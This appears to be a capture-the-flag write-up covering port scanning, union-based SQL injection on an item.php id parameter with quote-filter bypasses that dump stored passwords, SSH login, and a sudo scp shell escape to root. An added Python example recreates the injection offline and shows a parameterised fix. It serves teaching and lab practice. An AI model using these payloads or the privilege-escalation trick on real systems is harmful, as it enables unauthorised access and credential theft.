Initial foothold
1. Port scan
nmap -Pn <target ip>
nmap -Pn -p1000- <target ip>
There’re 2 open ports: 22 and 80.
2. OS and service scan
nmap -A -p22,80 <target ip>
There’re 2 services: SSH on port 22 and HTTP on port 80.
3. Vuln scan
nmap --script vuln -p22,80 <target ip>
There’s robots.txt on HTTP service.
Service Enumeration
1. SSH
ssh <target ip>
The connection succeeds.
2. HTTP service
nikto scan
nikto -h http://<target ip>
Directory scan w/ gobuster
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<target>/ -x php,txt,html,sh,cgi,bak -q
Access HTTP site
/index.php
Viewing the page source reveals little.
Follow the link to shop.php
Clicking on one of the choices, I was redirected to /item.php?id=3
/item.php?id=1
Conclusion:
id is a parameter. Maybe I can do SQL injection.
Exploitation
1. Intercept item.php w/ Burp Suite and send it to Intruder
2. Supply the payload and start the attack
Here’s my payload on GitHub.
Looking at the response lengths, there are many distinct values. I will start w/ 407.
Try the query
" or 1=1
Failed!!!
Next is 516. I skipped 408 and 409 because they are the same request; the length differs only because of the strings' size.
' or 1=1#
There’s a filter in this system.
Try 1765
0 or 1=1
No error. Good to go.
3. Test for union injection
Before attacking, I will encode the query w/ Burp Suite’s decoder function.
0 union select
The full request will be:
0 union select 1
0 union select 1,2
0 union select 1,2,3
I will mark the number positions with "$" (Intruder payload markers).
Load the payload
Here’s my GitHub link
Start the attack and judge by the response lengths. This machine is also vulnerable to union injection, and it needs 5 columns to display the result.
Test the query
0 union select 1,2,3,4,5
Version number
0 union select 1,2,version(),4,5
Database
0 union select 1,2,database(),4,5
Get other databases
0 union select 1,group_concat(schema_name),3,4,5 from information_schema.schemata
There’s only 1 interesting database: park.
Retrieve table names
0 union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()
Retrieve column names of table ‘users’
0 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name='users' and table_schema=database()
I was filtered.
Change single quote (') to double quote (")
0 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name="users" and table_schema=database()
Retrieve data
0 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name="users" and table_schema=database()
I was filtered. It was probably filtered by column name.
Test one by one starting w/ id
0 union select 1,group_concat(id),3,4,5 from users
There’re 2 users.
username
0 union select 1,group_concat(username),3,4,5 from users
I was filtered
password
0 union select 1,group_concat(password),3,4,5 from users
I got 2 passwords.
Before trying to work around the 'username' filtering, I will retrieve data from the table 'items'.
Column name
0 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name="items" and table_schema=database()
Data
0 union select 1,group_concat(id," ",package," ",price," ",information," ",sold),3,4,5 from items
Copy and arrange it. ID #5 mentioned filtered characters.
/item.php?id=5
There’s a message to Dennis.
Until now, there’re 2 possible usernames: dennis and Dennis
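The enumeration steps above (column-count discovery by response length, group_concat extraction, the blacklist filter that rejects single quotes and the word username) can be reproduced offline. The following is an added example written for this page, not code from the writeup or the target machine: it models item.php against an in-memory SQLite database with constructed sample data, with a filter assumed to behave the way the writeup observed. SQLite has no information_schema, version() or database(), so the table-listing step uses sqlite_master instead; the hardened handler at the end shows the fix (integer validation plus a bound parameter).

```python
import sqlite3

# Constructed schema and sample rows mirroring the writeup's tables
# (items has the 5 columns the UNION needed; data is invented).
SCHEMA = """
CREATE TABLE items (id INTEGER, package TEXT, price TEXT, information TEXT, sold INTEGER);
CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
INSERT INTO items VALUES (1, 'Family Pack', '20', 'two adults, two kids', 10);
INSERT INTO items VALUES (5, 'VIP Pack', '100', 'note to dennis: quotes are filtered', 0);
INSERT INTO users VALUES (1, 'dennis', 'passw0rd-one');
INSERT INTO users VALUES (2, 'admin', 'passw0rd-two');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


# Assumed blacklist: the writeup saw single quotes and 'username' rejected.
BLOCKLIST = ("'", "username")


def waf(value):
    """Return True when the value passes the (assumed) blacklist filter."""
    return not any(bad in value.lower() for bad in BLOCKLIST)


def item_vulnerable(conn, id_param):
    """Vulnerable item.php: the id parameter is concatenated into the query.
    Returns None when filtered, [] on a SQL error (the 'error page'), else rows."""
    if not waf(id_param):
        return None
    sql = ("SELECT id, package, price, information, sold FROM items WHERE id="
           + id_param)
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error:
        return []


def item_hardened(conn, id_param):
    """Fixed item.php: validate as an integer and bind it as a parameter."""
    try:
        item_id = int(id_param)
    except ValueError:
        return []
    return conn.execute(
        "SELECT id, package, price, information, sold FROM items WHERE id=?",
        (item_id,),
    ).fetchall()


def find_column_count(query_fn, max_cols=10):
    """The Intruder step: grow the UNION column list until rows come back.
    A mismatched column count errors out (shorter response); the first payload
    that returns rows gives the column count."""
    for n in range(1, max_cols + 1):
        cols = ",".join(str(i) for i in range(1, n + 1))
        rows = query_fn("0 union select " + cols)
        if rows:
            return n
    return None


def dump(query_fn, expr, table):
    """Extract one column with group_concat in the 2nd (displayed) position,
    e.g. dump(fn, 'password', 'users'). Returns None if filtered or errored."""
    rows = query_fn(f"0 union select 1,group_concat({expr}),3,4,5 from {table}")
    if not rows:
        return None
    return rows[0][1]


if __name__ == "__main__":
    conn = make_db()
    vuln = lambda p: item_vulnerable(conn, p)
    print("columns:", find_column_count(vuln))
    print("tables:", dump(vuln, "name", "sqlite_master"))
    print("passwords:", dump(vuln, "password", "users"))
    print("usernames:", dump(vuln, "username", "users"))  # filtered -> None
    print("hardened:", find_column_count(lambda p: item_hardened(conn, p)))
```

The hardened handler never reaches the database with a non-integer id, so the column-count probe returns None and the same payloads yield nothing; a blacklist like the one the writeup bypassed with double quotes is not a substitute for parameterised queries.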
4. Try to log in w/ SSH, starting w/ username dennis and both of the passwords.
Privilege Escalation
1. Verify sudo
sudo -l
I can escalate w/
Here’s the command
TF=$(mktemp)
echo 'sh 0<&2 1>&2' > $TF
chmod 777 "$TF"
sudo scp -S $TF x y:
whoami
Now I’m root.
2. Finding flags
1st flag is located in /home/dennis
5th flag is located in /root
2nd flag location is hinted in /home/ubuntu/.bash_history
It’s in /boot/grub/fonts/
3rd flag is written in /home/dennis/.bash_history